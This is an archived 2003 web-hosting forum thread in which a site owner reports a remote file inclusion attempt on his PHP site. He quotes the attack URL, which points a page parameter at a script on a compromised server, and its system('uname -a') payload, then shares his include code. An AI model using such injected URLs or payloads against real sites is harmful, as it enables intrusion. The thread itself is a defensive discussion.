GetDotted Domains

Viewing Thread:
"Trying to do something to my site..."

The "Freeola Customer Forum" forum, which includes Retro Game Reviews, has been archived and is now read-only. You cannot post here or create a new thread or review on this forum.

Sun 14/12/03 at 13:04
Regular
"Chavez, just hush.."
Posts: 11,080
Someone tried to do this:

http://phi11ip.com/?page=http://backup.wireplay.co.uk/.i/2

Luckily I wasn't stupid enough to leave the script open to attacks like that, it only accepts pages from my server.

It doesn't look like much, but I don't know what would happen if they had managed to run it:


$s = system("uname -a");
?>


What would that do?
Mon 15/12/03 at 15:20
Regular
"Twenty quid."
Posts: 11,452
Go phi11ip! Go phi11ip!

*makes stupid hand movements*
Mon 15/12/03 at 14:36
Regular
"Chavez, just hush.."
Posts: 11,080
The person who I get the hosting with knows the owner of Wireplay.co.uk, they contacted them on MSN to find out what was happening...

The owner of Wireplay didn't have a clue about it but found out that whoever did it must have gotten onto their server and uploaded the script.

They've managed to find that the person is in Colchester and uses NTL, Wireplay have contacted NTL about it...

Detective Phi1 strikes again.
Sun 14/12/03 at 15:08
Regular
"Twenty quid."
Posts: 11,452
Oh, good.
Sun 14/12/03 at 14:59
Regular
"Chavez, just hush.."
Posts: 11,080
Yup.
Sun 14/12/03 at 14:04
Regular
"Twenty quid."
Posts: 11,452
Would this sort of 'attack' only affect sites using PHP?
Sun 14/12/03 at 14:01
Regular
"Chavez, just hush.."
Posts: 11,080
Looking through my log files, just found that it had been tried.

They're looking into it.
Sun 14/12/03 at 13:44
Regular
"It goes so quickly"
Posts: 4,083
Thanks for that phi11ip.

How were you able to find out that someone had attempted this?
Sun 14/12/03 at 13:41
Regular
"It goes so quickly"
Posts: 4,083
Of course it is.

Sorry, I was thinking about protection from inputed data into a form.
Sun 14/12/03 at 13:41
Regular
"Chavez, just hush.."
Posts: 11,080

if (!$page) $page="mainpage"; //If $p is not defined by user, set it to 'main'

?>


if(file_exists("/phi11ip.com/var/www/html/$page.php"))
{
include("/phi11ip.com/var/www/html/$page.php");
}
else {
include("/phi11ip.com/var/www/html/404.php");
}

?>
Sun 14/12/03 at 13:37
Regular
"Pouch Ape"
Posts: 14,499
cjh wrote:
> How have you done this??

$filetoinclude="filename.data";
if(file_exists($filetoinclude) == TRUE)
{ include("$filetoinclude"); }
else
{ include("whoops.data"); }
; ?>

Freeola & GetDotted are rated 5 Stars

Check out some of our customer reviews below:

Impressive control panel
I have to say that I'm impressed with the features available having logged on... Loads of info - excellent.
Phil
Brilliant service.
Love it, love it, love it!
Christopher

View More Reviews

Need some help? Give us a call on 01376 55 60 60

Go to Support Centre

It appears you are using an old browser, as such, some parts of the Freeola and Getdotted site will not work as intended. Using the latest version of your browser, or another browser such as Google Chrome, Mozilla Firefox, or Opera will provide a better, safer browsing experience for you.